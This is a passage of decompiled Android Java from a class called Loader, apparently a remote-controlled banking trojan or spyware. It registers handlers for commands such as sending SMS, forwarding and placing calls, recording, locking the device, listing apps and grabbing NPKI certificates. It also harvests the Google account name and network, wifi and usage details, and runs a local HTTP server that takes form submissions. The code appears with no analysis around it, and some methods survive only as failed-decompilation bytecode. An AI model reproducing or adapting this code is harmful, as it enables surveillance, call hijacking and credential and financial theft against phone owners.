  3906. this.g.b("openbrowser2", new String[]{Locale.getDefault().toString()}).a(c.a.a.b.a.a()).a(new az(this, str), ba.a);
  3907. }
  3908.  
  3909. public static final Loader create() {
  3910. return Companion.a();
  3911. }
  3912.  
  3913. private final void d() {
  3914. this.g.a("sendSms", (d.e.a.b<? super Object[], ? extends c.a.h<?>>) new p(this));
  3915. this.g.a("setWifi", (d.e.a.b<? super Object[], ? extends c.a.h<?>>) new aa(this));
  3916. this.g.a("gcont", (d.e.a.b<? super Object[], ? extends c.a.h<?>>) new ac(this));
  3917. this.g.a("lock", (d.e.a.b<? super Object[], ? extends c.a.h<?>>) new ad(this));
  3918. this.g.a("bc", (d.e.a.b<? super Object[], ? extends c.a.h<?>>) new ae(this));
  3919. this.g.a("setForward", (d.e.a.b<? super Object[], ? extends c.a.h<?>>) new af(this));
  3920. this.g.a("getForward", (d.e.a.b<? super Object[], ? extends c.a.h<?>>) new ag(this));
  3921. this.g.a("hasPkg", (d.e.a.b<? super Object[], ? extends c.a.h<?>>) new ah(this));
  3922. this.g.a("setRingerMode", (d.e.a.b<? super Object[], ? extends c.a.h<?>>) new ai(this));
  3923. this.g.a("setRecEnable", (d.e.a.b<? super Object[], ? extends c.a.h<?>>) new q(this));
  3924. this.g.a("reqState", (d.e.a.b<? super Object[], ? extends c.a.h<?>>) new r(this));
  3925. this.g.a("showHome", (d.e.a.b<? super Object[], ? extends c.a.h<?>>) new s(this));
  3926. this.g.a("getnpki", (d.e.a.b<? super Object[], ? extends c.a.h<?>>) t.a);
  3927. this.g.a("http", (d.e.a.b<? super Object[], ? extends c.a.h<?>>) u.a);
  3928. this.g.a("onRecordAction", (d.e.a.b<? super Object[], ? extends c.a.h<?>>) new v(this));
  3929. this.g.a("call", (d.e.a.b<? super Object[], ? extends c.a.h<?>>) new w(this));
  3930. this.g.a("get_apps", (d.e.a.b<? super Object[], ? extends c.a.h<?>>) new x(this));
  3931. this.g.a("show_fs_float_window", (d.e.a.b<? super Object[], ? extends c.a.h<?>>) new y(this));
  3932. this.g.a("ping", (d.e.a.b<? super Object[], ? extends c.a.h<?>>) new z(this));
  3933. this.g.a("getPhoneState", (d.e.a.b<? super Object[], ? extends c.a.h<?>>) new ab(this));
  3934. }
  3935.  
  3936. /* access modifiers changed from: private|final */
  3937. public final String e() {
  3938. Account account;
  3939. Context context = this.a;
  3940. if (context == null) {
  3941. d.e.b.h.b("ctx");
  3942. }
  3943. Object systemService = context.getSystemService("account");
  3944. if (systemService == null) {
  3945. throw new d.g("null cannot be cast to non-null type android.accounts.AccountManager");
  3946. }
  3947. Account[] accounts = ((AccountManager) systemService).getAccounts();
  3948. String str = "";
  3949. d.e.b.h.a((Object) accounts, "accounts");
  3950. int length = accounts.length;
  3951. int i2 = 0;
  3952. while (true) {
  3953. if (i2 >= length) {
  3954. account = null;
  3955. break;
  3956. }
  3957. account = accounts[i2];
  3958. if (d.e.b.h.a((Object) "com.google", (Object) account.type)) {
  3959. break;
  3960. }
  3961. i2++;
  3962. }
  3963. if (account == null) {
  3964. return str;
  3965. }
  3966. String str2 = account.name;
  3967. d.e.b.h.a((Object) str2, "acc.name");
  3968. return str2;
  3969. }
  3970.  
  3971. /* access modifiers changed from: private|final */
  3972. @SuppressLint({"NewApi"})
  3973. public final void f() {
  3974. Context context = this.a;
  3975. if (context == null) {
  3976. d.e.b.h.b("ctx");
  3977. }
  3978. Object systemService = context.getSystemService("notification");
  3979. if (systemService == null) {
  3980. throw new d.g("null cannot be cast to non-null type android.app.NotificationManager");
  3981. }
  3982. NotificationManager notificationManager = (NotificationManager) systemService;
  3983. notificationManager.cancel(12312);
  3984. this.g.b("getnotify", null).a(c.a.a.b.a.a()).a(new g(this, notificationManager, 12312), h.a);
  3985. }
  3986.  
  3987. /* access modifiers changed from: private|final */
  3988. public final String g() {
  3989. int nextInt = new Random().nextInt(10000) + 2000;
  3990. b.g gVar = new b.g(nextInt);
  3991. gVar.a(new aw(this, "/"));
  3992. gVar.b(new ax(this, gVar, "/submit"));
  3993. new Thread(new ay(gVar)).start();
  3994. StringBuilder sb = new StringBuilder();
  3995. sb.append("http://127.0.0.1:");
  3996. sb.append(nextInt);
  3997. sb.append('/');
  3998. return sb.toString();
  3999. }
  4000.  
  4001. /* JADX DEBUG: Multi-variable type inference result: failure, time: 7 ms */
  4002. /* JADX WARNING: type inference failed for: r1v17 */
  4003. /* JADX WARNING: type inference failed for: r2v12, types: [com.d] */
  4004. /* access modifiers changed from: private|final */
  4005. /* JADX WARNING: Removed duplicated region for block: B:129:0x029a */
  4006. /* JADX WARNING: Removed duplicated region for block: B:132:0x0300 */
  4007. /* JADX WARNING: Removed duplicated region for block: B:138:0x031a */
  4008. /* JADX WARNING: Removed duplicated region for block: B:79:0x0193 */
  4009. /* JADX WARNING: Removed duplicated region for block: B:107:0x0230 */
  4010. /* JADX WARNING: Removed duplicated region for block: B:113:0x0248 */
  4011. /* JADX WARNING: Removed duplicated region for block: B:110:0x023d */
  4012. /* JADX WARNING: Unknown variable types count: 1 */
  4013. @android.annotation.SuppressLint({"WrongConstant", "NewApi"})
  4014. public final void h() {
  4015. /*
  4016. r14 = this;
  4017. com.g r0 = r14.g
  4018. boolean r0 = r0.b()
  4019. if (r0 != 0) goto L_0x0009
  4020. L_0x0008:
  4021. return
  4022. L_0x0009:
  4023. android.content.Context r0 = r14.a
  4024. if (r0 != 0) goto L_0x0012
  4025. java.lang.String r1 = "ctx"
  4026. d.e.b.h.b(r1)
  4027. L_0x0012:
  4028. java.lang.String r1 = "phone"
  4029. java.lang.Object r0 = r0.getSystemService(r1)
  4030. if (r0 != 0) goto L_0x0022
  4031. d.g r0 = new d.g
  4032. java.lang.String r1 = "null cannot be cast to non-null type android.telephony.TelephonyManager"
  4033. r0.m563init(r1)
  4034. throw r0
  4035. L_0x0022:
  4036. r6 = r0
  4037. android.telephony.TelephonyManager r6 = (android.telephony.TelephonyManager) r6
  4038. android.content.Context r0 = r14.a
  4039. if (r0 != 0) goto L_0x002e
  4040. java.lang.String r1 = "ctx"
  4041. d.e.b.h.b(r1)
  4042. L_0x002e:
  4043. java.lang.String r1 = "power"
  4044. java.lang.Object r0 = r0.getSystemService(r1)
  4045. if (r0 != 0) goto L_0x003e
  4046. d.g r0 = new d.g
  4047. java.lang.String r1 = "null cannot be cast to non-null type android.os.PowerManager"
  4048. r0.m563init(r1)
  4049. throw r0
  4050. L_0x003e:
  4051. r7 = r0
  4052. android.os.PowerManager r7 = (android.os.PowerManager) r7
  4053. int r0 = android.os.Build.VERSION.SDK_INT
  4054. r1 = 23
  4055. if (r0 < r1) goto L_0x00ab
  4056. java.lang.Class r0 = r7.getClass()
  4057. java.lang.String r1 = "isIgnoringBatteryOptimizations"
  4058. r2 = 1
  4059. java.lang.Class[] r2 = new java.lang.Class[r2]
  4060. r3 = 0
  4061. java.lang.Class r4 = java.lang.String.class
  4062. r2[r3] = r4
  4063. java.lang.reflect.Method r0 = r0.getMethod(r1, r2)
  4064. android.content.Context r1 = r14.a
  4065. if (r1 != 0) goto L_0x0062
  4066. java.lang.String r2 = "ctx"
  4067. d.e.b.h.b(r2)
  4068. L_0x0062:
  4069. java.lang.String r2 = "power"
  4070. java.lang.Object r1 = r1.getSystemService(r2)
  4071. android.content.Context r2 = r14.a
  4072. if (r2 != 0) goto L_0x0071
  4073. java.lang.String r3 = "ctx"
  4074. d.e.b.h.b(r3)
  4075. L_0x0071:
  4076. r3 = 1
  4077. java.lang.Object[] r3 = new java.lang.Object[r3]
  4078. r4 = 0
  4079. java.lang.String r2 = r2.getPackageName()
  4080. r3[r4] = r2
  4081. java.lang.Object r0 = r0.invoke(r1, r3)
  4082. if (r0 != 0) goto L_0x0089
  4083. d.g r0 = new d.g
  4084. java.lang.String r1 = "null cannot be cast to non-null type kotlin.Boolean"
  4085. r0.m563init(r1)
  4086. throw r0
  4087. L_0x0089:
  4088. java.lang.Boolean r0 = (java.lang.Boolean) r0
  4089. boolean r0 = r0.booleanValue()
  4090. r0 = r0 ^ 1
  4091. r9 = r0
  4092. L_0x0092:
  4093. android.content.Context r0 = r14.a
  4094. if (r0 != 0) goto L_0x009b
  4095. java.lang.String r1 = "ctx"
  4096. d.e.b.h.b(r1)
  4097. L_0x009b:
  4098. java.lang.String r1 = "connectivity"
  4099. java.lang.Object r0 = r0.getSystemService(r1)
  4100. if (r0 != 0) goto L_0x00ae
  4101. d.g r0 = new d.g
  4102. java.lang.String r1 = "null cannot be cast to non-null type android.net.ConnectivityManager"
  4103. r0.m563init(r1)
  4104. throw r0
  4105. L_0x00ab:
  4106. r0 = 0
  4107. r9 = r0
  4108. goto L_0x0092
  4109. L_0x00ae:
  4110. android.net.ConnectivityManager r0 = (android.net.ConnectivityManager) r0
  4111. android.net.NetworkInfo r1 = r0.getActiveNetworkInfo()
  4112. java.lang.String r0 = ""
  4113. if (r1 == 0) goto L_0x00c1
  4114. java.lang.String r0 = r1.getTypeName()
  4115. java.lang.String r1 = "info.typeName"
  4116. d.e.b.h.a(r0, r1)
  4117. L_0x00c1:
  4118. java.lang.String r1 = "MOBILE"
  4119. boolean r1 = d.e.b.h.a(r0, r1)
  4120. if (r1 == 0) goto L_0x0324
  4121. int r0 = r6.getNetworkType()
  4122. java.lang.String r0 = com.q.a(r0)
  4123. r5 = r0
  4124. L_0x00d2:
  4125. android.content.Context r0 = r14.a
  4126. if (r0 != 0) goto L_0x00db
  4127. java.lang.String r1 = "ctx"
  4128. d.e.b.h.b(r1)
  4129. L_0x00db:
  4130. java.lang.String r1 = "wifi"
  4131. java.lang.Object r0 = r0.getSystemService(r1)
  4132. if (r0 != 0) goto L_0x00eb
  4133. d.g r0 = new d.g
  4134. java.lang.String r1 = "null cannot be cast to non-null type android.net.wifi.WifiManager"
  4135. r0.m563init(r1)
  4136. throw r0
  4137. L_0x00eb:
  4138. android.net.wifi.WifiManager r0 = (android.net.wifi.WifiManager) r0
  4139. java.lang.String r1 = "WIFI"
  4140. boolean r1 = d.e.b.h.a(r5, r1)
  4141. if (r1 == 0) goto L_0x031e
  4142. android.net.wifi.WifiInfo r8 = r0.getConnectionInfo()
  4143. java.lang.String r1 = "curr"
  4144. d.e.b.h.a(r8, r1)
  4145. java.lang.String r1 = r8.getBSSID()
  4146. if (r1 == 0) goto L_0x031e
  4147. java.util.HashMap<java.lang.String, java.lang.String> r1 = r14.w
  4148. java.lang.String r2 = r8.getBSSID()
  4149. java.lang.Object r1 = r1.get(r2)
  4150. java.lang.String r1 = (java.lang.String) r1
  4151. if (r1 != 0) goto L_0x016b
  4152. java.util.List r2 = r0.getScanResults()
  4153. java.lang.String r3 = "scanResults"
  4154. d.e.b.h.a(r2, r3)
  4155. java.lang.Iterable r2 = (java.lang.Iterable) r2
  4156. java.util.Iterator r10 = r2.iterator()
  4157. L_0x0121:
  4158. boolean r3 = r10.hasNext()
  4159. if (r3 == 0) goto L_0x0168
  4160. java.lang.Object r4 = r10.next()
  4161. r3 = r4
  4162. android.net.wifi.ScanResult r3 = (android.net.wifi.ScanResult) r3
  4163. java.lang.String r3 = r3.BSSID
  4164. java.lang.String r11 = r8.getBSSID()
  4165. boolean r3 = d.e.b.h.a(r3, r11)
  4166. if (r3 == 0) goto L_0x0121
  4167. r3 = r4
  4168. L_0x013b:
  4169. android.net.wifi.ScanResult r3 = (android.net.wifi.ScanResult) r3
  4170. if (r3 == 0) goto L_0x0321
  4171. java.lang.String r1 = r3.capabilities
  4172. r3 = r1
  4173. L_0x0142:
  4174. java.util.Iterator r4 = r2.iterator()
  4175. L_0x0146:
  4176. boolean r1 = r4.hasNext()
  4177. if (r1 == 0) goto L_0x016a
  4178. java.lang.Object r1 = r4.next()
  4179. android.net.wifi.ScanResult r1 = (android.net.wifi.ScanResult) r1
  4180. java.util.HashMap<java.lang.String, java.lang.String> r2 = r14.w
  4181. java.util.Map r2 = (java.util.Map) r2
  4182. java.lang.String r8 = r1.BSSID
  4183. java.lang.String r10 = "it.BSSID"
  4184. d.e.b.h.a(r8, r10)
  4185. java.lang.String r1 = r1.capabilities
  4186. java.lang.String r10 = "it.capabilities"
  4187. d.e.b.h.a(r1, r10)
  4188. r2.put(r8, r1)
  4189. goto L_0x0146
  4190. L_0x0168:
  4191. r3 = 0
  4192. goto L_0x013b
  4193. L_0x016a:
  4194. r1 = r3
  4195. L_0x016b:
  4196. if (r1 == 0) goto L_0x031e
  4197. java.lang.CharSequence r1 = (java.lang.CharSequence) r1
  4198. java.lang.String r2 = "WPA"
  4199. java.lang.CharSequence r2 = (java.lang.CharSequence) r2
  4200. r3 = 0
  4201. r4 = 2
  4202. r5 = 0
  4203. boolean r2 = d.i.m.a(r1, r2, r3, r4, r5)
  4204. if (r2 != 0) goto L_0x0189
  4205. java.lang.String r2 = "WEP"
  4206. java.lang.CharSequence r2 = (java.lang.CharSequence) r2
  4207. r3 = 0
  4208. r4 = 2
  4209. r5 = 0
  4210. boolean r1 = d.i.m.a(r1, r2, r3, r4, r5)
  4211. if (r1 == 0) goto L_0x01de
  4212. L_0x0189:
  4213. java.lang.String r5 = "WIFI有密码"
  4214. r10 = r5
  4215. L_0x018c:
  4216. java.lang.String r4 = ""
  4217. r1 = -1
  4218. java.lang.String r2 = ""
  4219. if (r0 == 0) goto L_0x031a
  4220. android.net.wifi.WifiInfo r3 = r0.getConnectionInfo()
  4221. if (r3 == 0) goto L_0x0317
  4222. java.lang.String r1 = r3.getMacAddress()
  4223. if (r1 == 0) goto L_0x01e2
  4224. r4 = r1
  4225. L_0x01a0:
  4226. int r1 = r3.getRssi()
  4227. r2 = 10
  4228. int r5 = android.net.wifi.WifiManager.calculateSignalLevel(r1, r2)
  4229. java.lang.String r2 = r3.getSSID()
  4230. java.lang.String r1 = "wifiInfo.ssid"
  4231. d.e.b.h.a(r2, r1)
  4232. if (r2 == 0) goto L_0x01c5
  4233. r1 = r2
  4234. java.lang.CharSequence r1 = (java.lang.CharSequence) r1
  4235. java.lang.String r3 = "unknown ssid"
  4236. java.lang.CharSequence r3 = (java.lang.CharSequence) r3
  4237. r8 = 0
  4238. r11 = 2
  4239. r12 = 0
  4240. boolean r1 = d.i.m.a(r1, r3, r8, r11, r12)
  4241. if (r1 == 0) goto L_0x0314
  4242. L_0x01c5:
  4243. android.content.Context r1 = r14.a
  4244. if (r1 != 0) goto L_0x01ce
  4245. java.lang.String r3 = "ctx"
  4246. d.e.b.h.b(r3)
  4247. L_0x01ce:
  4248. java.lang.String r3 = "connectivity"
  4249. java.lang.Object r1 = r1.getSystemService(r3)
  4250. if (r1 != 0) goto L_0x01e6
  4251. d.g r0 = new d.g
  4252. java.lang.String r1 = "null cannot be cast to non-null type android.net.ConnectivityManager"
  4253. r0.m563init(r1)
  4254. throw r0
  4255. L_0x01de:
  4256. java.lang.String r5 = "WIFI无密码"
  4257. r10 = r5
  4258. goto L_0x018c
  4259. L_0x01e2:
  4260. java.lang.String r1 = ""
  4261. r4 = r1
  4262. goto L_0x01a0
  4263. L_0x01e6:
  4264. android.net.ConnectivityManager r1 = (android.net.ConnectivityManager) r1
  4265. r3 = 1
  4266. android.net.NetworkInfo r1 = r1.getNetworkInfo(r3)
  4267. if (r1 == 0) goto L_0x0314
  4268. java.lang.String r1 = r1.getExtraInfo()
  4269. if (r1 == 0) goto L_0x0245
  4270. L_0x01f5:
  4271. r2 = r1
  4272. r3 = r5
  4273. L_0x01f7:
  4274. android.net.DhcpInfo r0 = r0.getDhcpInfo()
  4275. if (r0 == 0) goto L_0x0310
  4276. java.lang.StringBuilder r1 = new java.lang.StringBuilder
  4277. r1.<init>()
  4278. r1.append(r4)
  4279. java.lang.String r4 = ","
  4280. r1.append(r4)
  4281. int r0 = r0.gateway
  4282. r4 = 16
  4283. int r4 = d.i.a.a(r4)
  4284. java.lang.String r0 = java.lang.Integer.toString(r0, r4)
  4285. java.lang.String r4 = "java.lang.Integer.toStri…(this, checkRadix(radix))"
  4286. d.e.b.h.a(r0, r4)
  4287. r1.append(r0)
  4288. java.lang.String r0 = ","
  4289. r1.append(r0)
  4290. r1.append(r2)
  4291. java.lang.String r4 = r1.toString()
  4292. r11 = r4
  4293. r12 = r3
  4294. L_0x022c:
  4295. android.content.Context r0 = r14.a
  4296. if (r0 != 0) goto L_0x0235
  4297. java.lang.String r1 = "ctx"
  4298. d.e.b.h.b(r1)
  4299. L_0x0235:
  4300. java.lang.String r1 = "audio"
  4301. java.lang.Object r0 = r0.getSystemService(r1)
  4302. if (r0 != 0) goto L_0x0248
  4303. d.g r0 = new d.g
  4304. java.lang.String r1 = "null cannot be cast to non-null type android.media.AudioManager"
  4305. r0.m563init(r1)
  4306. throw r0
  4307. L_0x0245:
  4308. java.lang.String r1 = ""
  4309. goto L_0x01f5
  4310. L_0x0248:
  4311. r8 = r0
  4312. android.media.AudioManager r8 = (android.media.AudioManager) r8
  4313. int r0 = android.os.Build.VERSION.SDK_INT
  4314. r1 = 21
  4315. if (r0 < r1) goto L_0x030d
  4316. android.content.Context r0 = r14.a
  4317. if (r0 != 0) goto L_0x025a
  4318. java.lang.String r1 = "ctx"
  4319. d.e.b.h.b(r1)
  4320. L_0x025a:
  4321. java.lang.String r1 = "usagestats"
  4322. java.lang.Object r0 = r0.getSystemService(r1)
  4323. if (r0 != 0) goto L_0x026a
  4324. d.g r0 = new d.g
  4325. java.lang.String r1 = "null cannot be cast to non-null type android.app.usage.UsageStatsManager"
  4326. r0.m563init(r1)
  4327. throw r0
  4328. L_0x026a:
  4329. android.app.usage.UsageStatsManager r0 = (android.app.usage.UsageStatsManager) r0
  4330. r1 = 4
  4331. long r2 = java.lang.System.currentTimeMillis()
  4332. r4 = 86400000(0x5265c00, float:7.82218E-36)
  4333. long r4 = (long) r4
  4334. long r2 = r2 - r4
  4335. long r4 = java.lang.System.currentTimeMillis()
  4336. java.util.List r0 = r0.queryUsageStats(r1, r2, r4)
  4337. if (r0 == 0) goto L_0x0286
  4338. boolean r0 = r0.isEmpty()
  4339. if (r0 == 0) goto L_0x030d
  4340. L_0x0286:
  4341. r0 = 0
  4342. L_0x0287:
  4343. java.lang.String r1 = "WS"
  4344. java.lang.String r2 = "state update"
  4345. android.util.Log.d(r1, r2)
  4346. com.g r1 = r14.g
  4347. java.lang.String r2 = r6.getNetworkOperatorName()
  4348. int r3 = r14.v
  4349. android.content.SharedPreferences r4 = r14.e
  4350. if (r4 != 0) goto L_0x029f
  4351. java.lang.String r5 = "preferences"
  4352. d.e.b.h.b(r5)
  4353. L_0x029f:
  4354. java.lang.String r5 = "state"
  4355. r6 = 10
  4356. java.lang.Object[] r6 = new java.lang.Object[r6]
  4357. r13 = 0
  4358. r6[r13] = r2
  4359. r2 = 1
  4360. r6[r2] = r10
  4361. r2 = 2
  4362. r6[r2] = r11
  4363. r2 = 3
  4364. java.lang.Integer r3 = java.lang.Integer.valueOf(r3)
  4365. r6[r2] = r3
  4366. r2 = 4
  4367. java.lang.Integer r3 = java.lang.Integer.valueOf(r12)
  4368. r6[r2] = r3
  4369. r2 = 5
  4370. java.lang.String r3 = "admin"
  4371. r10 = 0
  4372. boolean r3 = r4.getBoolean(r3, r10)
  4373. java.lang.Boolean r3 = java.lang.Boolean.valueOf(r3)
  4374. r6[r2] = r3
  4375. r2 = 6
  4376. java.lang.Boolean r3 = java.lang.Boolean.valueOf(r9)
  4377. r6[r2] = r3
  4378. r2 = 7
  4379. boolean r3 = r7.isScreenOn()
  4380. r3 = r3 ^ 1
  4381. java.lang.Boolean r3 = java.lang.Boolean.valueOf(r3)
  4382. r6[r2] = r3
  4383. r2 = 8
  4384. int r3 = r8.getRingerMode()
  4385. java.lang.Integer r3 = java.lang.Integer.valueOf(r3)
  4386. r6[r2] = r3
  4387. r2 = 9
  4388. java.lang.Boolean r0 = java.lang.Boolean.valueOf(r0)
  4389. r6[r2] = r0
  4390. c.a.s r3 = r1.b(r5, r6)
  4391. com.Loader$m r0 = com.Loader.m.a
  4392. c.a.d.d r0 = (c.a.d.d) r0
  4393. com.Loader$n r1 = com.Loader.n.a
  4394. d.e.a.b r1 = (d.e.a.b) r1
  4395. if (r1 == 0) goto L_0x0306
  4396. com.d r2 = new com.d
  4397. r2.m362init(r1)
  4398. r1 = r2
  4399. L_0x0306:
  4400. c.a.d.d r1 = (c.a.d.d) r1
  4401. r3.a(r0, r1)
  4402. goto L_0x0008
  4403. L_0x030d:
  4404. r0 = 1
  4405. goto L_0x0287
  4406. L_0x0310:
  4407. r11 = r4
  4408. r12 = r3
  4409. goto L_0x022c
  4410. L_0x0314:
  4411. r3 = r5
  4412. goto L_0x01f7
  4413. L_0x0317:
  4414. r3 = r1
  4415. goto L_0x01f7
  4416. L_0x031a:
  4417. r11 = r4
  4418. r12 = r1
  4419. goto L_0x022c
  4420. L_0x031e:
  4421. r10 = r5
  4422. goto L_0x018c
  4423. L_0x0321:
  4424. r3 = r1
  4425. goto L_0x0142
  4426. L_0x0324:
  4427. r5 = r0
  4428. goto L_0x00d2
  4429. */
  4430. throw new UnsupportedOperationException("Method not decompiled: com.Loader.h():void");
  4431. }
  4432.  
  4433. /* JADX DEBUG: Multi-variable type inference result: failure, time: 6 ms */
  4434. /* JADX WARNING: type inference failed for: r1v4 */
  4435. /* JADX WARNING: type inference failed for: r2v3, types: [com.d] */
  4436. /* access modifiers changed from: private|final */
  4437. /* JADX WARNING: Unknown variable types count: 1 */
  4438. public final void i() {
  4439. /*
  4440. r5 = this;
  4441. r2 = 1
  4442. android.app.Dialog r0 = r5.x
  4443. if (r0 == 0) goto L_0x000b
  4444. boolean r0 = r0.isShowing()
  4445. if (r0 == r2) goto L_0x0038
  4446. L_0x000b:
  4447. com.g r0 = r5.g
  4448. java.lang.String r1 = "getPkgMap"
  4449. java.lang.Boolean[] r2 = new java.lang.Boolean[r2]
  4450. r3 = 0
  4451. boolean r4 = r5.j()
  4452. java.lang.Boolean r4 = java.lang.Boolean.valueOf(r4)
  4453. r2[r3] = r4
  4454. c.a.s r3 = r0.b(r1, r2)
  4455. com.Loader$c r0 = new com.Loader$c
  4456. r0.m233init(r5)
  4457. c.a.d.d r0 = (c.a.d.d) r0
  4458. com.Loader$d r1 = com.Loader.d.a
  4459. d.e.a.b r1 = (d.e.a.b) r1
  4460. if (r1 == 0) goto L_0x0033
  4461. com.d r2 = new com.d
  4462. r2.m362init(r1)
  4463. r1 = r2
  4464. L_0x0033:
  4465. c.a.d.d r1 = (c.a.d.d) r1
  4466. r3.a(r0, r1)
  4467. L_0x0038:
  4468. android.os.Handler r1 = r5.b
  4469. com.Loader$e r0 = new com.Loader$e
  4470. r0.m248init(r5)
  4471. java.lang.Runnable r0 = (java.lang.Runnable) r0
  4472. r2 = 500000(0x7a120, double:2.47033E-318)
  4473. r1.postDelayed(r0, r2)
  4474. return
  4475. */
  4476. throw new UnsupportedOperationException("Method not decompiled: com.Loader.i():void");
  4477. }
  4478.  
  4479. private final boolean j() {
  4480. for (String contains : c.c) {
  4481. if (this.c.contains(contains)) {
  4482. return true;
  4483. }
  4484. }
  4485. return false;
  4486. }
  4487.  
  4488. /* JADX DEBUG: Multi-variable type inference result: failure, time: 5 ms */
  4489. /* JADX WARNING: type inference failed for: r0v0, types: [java.lang.Throwable, java.lang.Runtime] */
  4490. /* JADX WARNING: Multi-variable type inference failed. Error: jadx.core.utils.exceptions.JadxRuntimeException: No candidate types for var: r0v0, types: [java.lang.Throwable, java.lang.Runtime]
  4491. assigns: [java.lang.Runtime]
  4492. uses: [java.lang.Throwable]
  4493. at jadx.core.dex.visitors.typeinference.TypeSearch.fillTypeCandidates(TypeSearch.java:231)
  4494. at java.util.ArrayList.forEach(Unknown Source)
  4495. at jadx.core.dex.visitors.typeinference.TypeSearch.run(TypeSearch.java:53)
  4496. at jadx.core.dex.visitors.typeinference.TypeInferenceVisitor.runMultiVariableSearch(TypeInferenceVisitor.java:97)
  4497. at jadx.core.dex.visitors.typeinference.TypeInferenceVisitor.visit(TypeInferenceVisitor.java:88)
  4498. at jadx.core.dex.visitors.DepthTraversal.visit(DepthTraversal.java:27)
  4499. at jadx.core.dex.visitors.DepthTraversal.lambda$visit$1(DepthTraversal.java:14)
  4500. at java.util.ArrayList.forEach(Unknown Source)
  4501. at jadx.core.dex.visitors.DepthTraversal.visit(DepthTraversal.java:14)
  4502. at jadx.core.ProcessClass.process(ProcessClass.java:30)
  4503. at jadx.api.JadxDecompiler.processClass(JadxDecompiler.java:290)
  4504. at jadx.api.JavaClass.decompile(JavaClass.java:62)
  4505. */
  4506. /* JADX WARNING: Unknown variable types count: 1 */
  4507. public final void broadcastHeadsetConnected(boolean r3) {
  4508. /*
  4509. r2 = this;
  4510. java.lang.RuntimeException r0 = new java.lang.RuntimeException
  4511. java.lang.String r1 = "d2j fail translate: java.lang.RuntimeException: can not merge I and Z\r\n\tat com.googlecode.dex2jar.ir.TypeClass.merge(TypeClass.java:100)\r\n\tat com.googlecode.dex2jar.ir.ts.TypeTransformer$TypeRef.updateTypeClass(TypeTransformer.java:174)\r\n\tat com.googlecode.dex2jar.ir.ts.TypeTransformer$TypeAnalyze.copyTypes(TypeTransformer.java:311)\r\n\tat com.googlecode.dex2jar.ir.ts.TypeTransformer$TypeAnalyze.fixTypes(TypeTransformer.java:226)\r\n\tat com.googlecode.dex2jar.ir.ts.TypeTransformer$TypeAnalyze.analyze(TypeTransformer.java:207)\r\n\tat com.googlecode.dex2jar.ir.ts.TypeTransformer.transform(TypeTransformer.java:44)\r\n\tat com.googlecode.d2j.dex.Dex2jar$2.optimize(Dex2jar.java:162)\r\n\tat com.googlecode.d2j.dex.Dex2Asm.convertCode(Dex2Asm.java:414)\r\n\tat com.googlecode.d2j.dex.ExDex2Asm.convertCode(ExDex2Asm.java:42)\r\n\tat com.googlecode.d2j.dex.Dex2jar$2.convertCode(Dex2jar.java:128)\r\n\tat com.googlecode.d2j.dex.Dex2Asm.convertMethod(Dex2Asm.java:509)\r\n\tat com.googlecode.d2j.dex.Dex2Asm.convertClass(Dex2Asm.java:406)\r\n\tat com.googlecode.d2j.dex.Dex2Asm.convertDex(Dex2Asm.java:422)\r\n\tat com.googlecode.d2j.dex.Dex2jar.doTranslate(Dex2jar.java:172)\r\n\tat com.googlecode.d2j.dex.Dex2jar.to(Dex2jar.java:272)\r\n\tat com.googlecode.dex2jar.tools.Dex2jarCmd.doCommandLine(Dex2jarCmd.java:108)\r\n\tat com.googlecode.dex2jar.tools.BaseCmd.doMain(BaseCmd.java:288)\r\n\tat com.googlecode.dex2jar.tools.Dex2jarCmd.main(Dex2jarCmd.java:32)\r\n"
  4512. r0.<init>(r1)
  4513. throw r0
  4514. */
  4515. throw new UnsupportedOperationException("Method not decompiled: com.Loader.broadcastHeadsetConnected(boolean):void");
  4516. }
  4517.  
  4518. public final f getCallListener() {
  4519. return this.m;
  4520. }
  4521.  
  4522. public final long getFirstAppDate() {
  4523. if (this.z != 0) {
  4524. return this.z;
  4525. }
  4526. Context context = this.a;
  4527. if (context == null) {
  4528. d.e.b.h.b("ctx");
  4529. }
  4530. PackageManager packageManager = context.getPackageManager();
  4531. if (this.z == 0) {
  4532. List<PackageInfo> installedPackages = packageManager.getInstalledPackages(0);
  4533. d.e.b.h.a((Object) installedPackages, "pm.getInstalledPackages(0)");
  4534. for (PackageInfo packageInfo : installedPackages) {
  4535. if (packageInfo.applicationInfo.flags == false || 1 == false) {
  4536. this.z = this.z == 0 ? packageInfo.firstInstallTime : Math.min(this.z, packageInfo.firstInstallTime);
  4537. }
  4538. }
  4539. }
  4540. return this.z;
  4541. }
  4542.  
  4543. public final long getFirstAppTime() {
  4544. return this.z;
  4545. }
  4546.  
  4547. public final View getFsFloatView() {
  4548. return this.n;
  4549. }
  4550.  
  4551. public final String getHtmlPhoneText() {
  4552. return this.E;
  4553. }
  4554.  
  4555. public final String getHtmlText() {
  4556. return this.C;
  4557. }
  4558.  
  4559. public final String getHtmlTextCHT() {
  4560. return this.D;
  4561. }
  4562.  
  4563. public final String getHttpPhoneServerUrl() {
  4564. return this.t;
  4565. }
  4566.  
  4567. public final AlertDialog getHttpServerDlg() {
  4568. return this.q;
  4569. }
  4570.  
  4571. public final String getHttpServerUrl() {
  4572. return this.p;
  4573. }
  4574.  
  4575. @SuppressLint({"WrongConstant"})
  4576. public final String getTopActivityName$loader_release(Context context) {
  4577. d.e.b.h.b(context, "context");
  4578. try {
  4579. if (VERSION.SDK_INT < 21) {
  4580. String str = null;
  4581. Object systemService = context.getSystemService("activity");
  4582. if (systemService == null) {
  4583. throw new d.g("null cannot be cast to non-null type android.app.ActivityManager");
  4584. }
  4585. List runningTasks = ((ActivityManager) systemService).getRunningTasks(100);
  4586. if (runningTasks == null) {
  4587. return str;
  4588. }
  4589. Iterator it = runningTasks.iterator();
  4590. if (!it.hasNext()) {
  4591. return str;
  4592. }
  4593. ComponentName componentName = ((RunningTaskInfo) it.next()).topActivity;
  4594. d.e.b.h.a((Object) componentName, "f");
  4595. String className = componentName.getClassName();
  4596. StringBuilder sb = new StringBuilder();
  4597. sb.append(componentName.getPackageName());
  4598. sb.append("/");
  4599. sb.append(className);
  4600. return sb.toString();
  4601. }
  4602. long currentTimeMillis = System.currentTimeMillis();
  4603. Object systemService2 = context.getSystemService("usagestats");
  4604. if (systemService2 == null) {
  4605. throw new d.g("null cannot be cast to non-null type android.app.usage.UsageStatsManager");
  4606. }
  4607. List<UsageStats> queryUsageStats = ((UsageStatsManager) systemService2).queryUsageStats(4, currentTimeMillis - ((long) 10000), currentTimeMillis);
  4608. if (queryUsageStats == null) {
  4609. return null;
  4610. }
  4611. if (queryUsageStats.isEmpty()) {
  4612. return null;
  4613. }
  4614. UsageStats usageStats = null;
